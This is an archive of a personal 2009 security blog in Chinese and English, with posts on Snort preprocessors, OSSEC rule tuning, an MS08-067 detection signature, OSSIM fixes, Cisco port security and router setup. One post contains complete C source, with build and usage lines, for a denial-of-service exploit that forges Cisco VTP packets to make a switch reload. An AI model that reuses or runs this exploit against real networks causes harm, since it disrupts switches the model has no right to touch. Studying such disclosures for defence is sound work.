2009年4月30日星期四

php中intval()函数的安全应用的思考

看了php内置函数intval()使用不当导致安全漏洞的分析

我感觉一般情况下:intval()是用在对用户提交的信息进行过滤,去掉非数字,来防止sql注入。很少会有程序,用来if判断。而在if判断的情况下,加不加intval()并不影响任何黑盒测试的结果。无法进一步的扩展。

2009年4月9日星期四

怎样在windows xp(32bit)系统上的vmware中安装64位操作系统

由于ossim-1.2的ios是只支持64bit的,因此在vm上安装过程中出现了些问题,解决方法如下:

1.首先要确认使用的cpu是支持的.
在www.vmware.com/info?id=152中讲的比较清楚,AMD64必须是在revison D之后的才能支持,Intel的需要EM64T and VT support。通过cpu-z可以知道我的T7500是支持EM64T的,这就需要第二步
2.开启VT support
在BIOS的设置中,找到VT的开关,使其Enable。然后重要的一点是,主机必须“冷启动”,即按power键启动,该设置才能生效。


2009年4月2日星期四

What is a Snort Preprocessor?

Preprocessors are pluggable components of Snort, introduced since version 1.5. They're "located" just after the module of protocol analysis and before the detection engine and do not depend of rules. They are called whenever a packet arrives, but JUST ONCE, the detection plugins, in the other hand, do depend of rules and may be applied many times for a single packet. SPP's can be used in different ways: They can look for an specific behavior(portscan, flowportscan), to be support for further analysis like flow, or just collect certain information, like perfmonitor.

2009年3月30日星期一

A tip of cooking OSSEC rules

How to config OSSEC rules to ignore something?
I have the logs like this

Mar 30 17:50:20 192.168.x.201 192.168.xx.104 - - [30/Mar/2009:17:50:43 +0800] "OPTIONS /svn HTTP/1.1" 401 401
Mar 30 17:50:21 192.168.x.201 192.168.xx.104 - root [30/Mar/2009:17:50:44 +0800] "OPTIONS /svn HTTP/1.1" 401 401
Mar 30 17:50:22 192.168.x.201 192.168.xx.104 - svn [30/Mar/2009:17:50:45 +0800] "OPTIONS /svn HTTP/1.1" 401 401
Mar 30 17:50:24 192.168.x.201 192.168.xx.104 - user [30/Mar/2009:17:50:46 +0800] "OPTIONS /svn HTTP/1.1" 401 401

I just want alert,when somebody make 4xx errors in a short time. but I want to ignore the "-",in the user field.

first, I add the user field in etc/decoder.xml

web-log ^\d+.\d+.\d+.\d+ ^(\d+.\d+.\d+.\d+) \S+ (\S+) [\S+ \S\d+] "\w+ (\S+) HTTP\S+ (\d+) srcip, user, url, id the add new rules 31101 ^- 31101 Multiple web server 4XX error code. from same source ip. alert_by_email attack,


You can ignore the user field is "-",by let the level=0,in front rule 31166.

2009年3月29日星期日

the frag3 preprocess in snort

why need the frag3 preprocessor?
frag3 preprocessor is a target-based analysis.
The term “target-based” is to identify an intelligent IDS that is informed about hosts residing on the network and is capable of analyzing traffic sent to those hosts as the host itself analyzes the traffic.
It improve the accuracy of the IDS.

for example:


How to use frag3 preprocessor in snort.conf?


like:
preprocessor frag3_engine: policy first, bind_to 10.4.10.0/24

Now any overlapping fragments that Snort sees destined for subnet 10.4.1.x are reassembled using the “first”
fragmentation policy, so that Snort reassembles fragments destined to those hosts in precisely the same way as the
Windows hosts themselves.

2009年3月27日星期五

snort rule for MS08-067

alert tcp any any -> any 445 (msg:"MS08067 RPC exploit"; content:"|2e 00 5c 00 5c|";offset:140; content:"|00 5c 00 2e 00 2e 00 5c 00 2e 00 2e 00 5c 00|"; within:20;metadata:service RPC; classtype:bad-unknown; sid:9000015; rev:1;)




it works!

2009年3月17日星期二

what's the manner of ossimframework.OssimDB : Error executing query (INSERT INTO event_stats....

ossim version 1.0.6,has a bug: it didn't create the snort.event_stats table,cause the events->event stats display error.

this problem described in https://www.ossim.net/forum/index.php?t=msg&goto=1125&S=fa53755c1ecfa7a74cb39dc4c245919e&srch=%22Event+Stats%22#msg_1125

you can resolve this through:
mysql -uroot -p snort < snort.event_stats.sql

2009年3月6日星期五

apache的index设置


DirectoryIndex index.html index.php

index.html和index.php直接要使用 '空格'而不是 ,

2009年2月27日星期五

How to bind mac-address to cisco switch port

interface:
switchport port-security
switchport port-security violation restrict
switchport port-security mac-address 1111.1111.1111

the "restrict" is recommend

2009年1月14日星期三

DoS code for Cisco VLAN Trunking Protocol Vulnerability

/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
*
*vulerability discription:
*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
*
*To Known:
* 1.the switch must in Server/Client Mode.
* 2.the port ,attacker connected,must be in trunk Mode.
* Cisco Ethernet ports with no configuration are not
* in trunk.but trunk mode can be obtained through DTP
* attack by Yersinia.
* 3.you must known the vtp domain,this can be sniffed
* 4.some codes are from Yersinia.
*
*Result:
* switch reload.
*
*
*Compile:
* gcc -o vtp `libnet-config --libs` vtp.c
*
*Usage:vtp -i -d
*
*Contact: showrun.lee[AT]gmail.com
*http://sh0wrun.blogspot.com/
*/
#include
#include
#include

#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary {
u_int8_t version;
u_int8_t code;
u_int8_t followers;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
u_int32_t revision;
u_int32_t updater;
u_int8_t timestamp[VTP_TIMESTAMP_SIZE];
u_int8_t md5[16];
};

struct vtp_subset {
u_int8_t version;
u_int8_t code;
u_int8_t seq;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
u_int32_t revision;
};

void usage( char *s) {
printf("%s -i -d \n",s);
exit (1);
}

int main( int argc, char *argv[] )
{
int opt,k=0;
extern char *optarg;
libnet_ptag_t t;
libnet_t *lhandler;
u_int32_t vtp_len=0, sent;
struct vtp_summary *vtp_summ;
struct vtp_subset *vtp_sub;
u_int8_t *vtp_packet,*vtp_packet2, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
struct libnet_ether_addr *mymac;
char *device;
char error_information[LIBNET_ERRBUF_SIZE];
char *domain;

// get options
while ((opt = getopt(argc, argv, "i:d:")) != -1)
{
switch (opt) {
case 'i':
device=malloc(strlen(optarg));
strcpy(device,optarg);
k=1;
break;

case 'd':
domain=malloc(strlen(optarg));
strcpy(domain,optarg);
break;

default: usage(argv[0]);
}
}
if(!k) { printf(" %s -i -d \n must assign the interface\n",argv[0]);exit(1);}

//init libnet

lhandler=libnet_init(LIBNET_LINK,device,error_information);
if (!lhandler) {
fprintf(stderr, "libnet_init: %s\n", error_information);
return -1;
}

mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
vtp_packet = calloc(1,vtp_len);
aux = vtp_packet;
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_summ = (struct vtp_summary *)aux;
vtp_summ->version = 0x01;
vtp_summ->code = 0x01;//vtp_summary
vtp_summ->followers = 0x01;
vtp_summ->dom_len = strlen(domain);
memcpy(vtp_summ->domain,domain,strlen(domain));
vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */

sent = libnet_write(lhandler);

if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);

//build the second vtp packet for vtp_subset
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
vtp_packet2 = calloc(1,vtp_len);
aux = vtp_packet2;
memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);

vtp_sub = (struct vtp_subset *)aux;
vtp_sub->version = 0x01;
vtp_sub->code = 0x02; //vtp_subset
vtp_sub->seq = 0x01;
vtp_sub->dom_len = strlen(domain);
memcpy(vtp_sub->domain,domain,strlen(domain));
vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
// memcpy(vtp_sub->aaa,aaa,strlen(aaa));

t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet2, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */

sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
}

2009年1月6日星期二

"repeater mode" in the DD-WRT

If you want to repeat the network from an another AP,you can set the wireless->basic-setting->"Wireless Physical Interface" to "client" or "client bridge","repeater" or "repeater bridge".the difference between these can be searched. what I want to say is above all you must set setup->Basic setup-> WAN Connection Type->connection type in "DHCP" mod。 because without this the dd-wrt cannot acquire IP address from the another AP,which you want to repeated。

2009年1月4日星期日

Debian下使用monit实现程序的自动重启

debian是使用monit来实现对允许的程序进行监控,并能实现自动重启。

另外在/etc/inittab,使用respawn选项,也可以实现对程序的实时监控。

watchdog实现的目标是对系统的状态进行监控,当出现异常时可以重启操作系统,并不适合对进程状态的监控。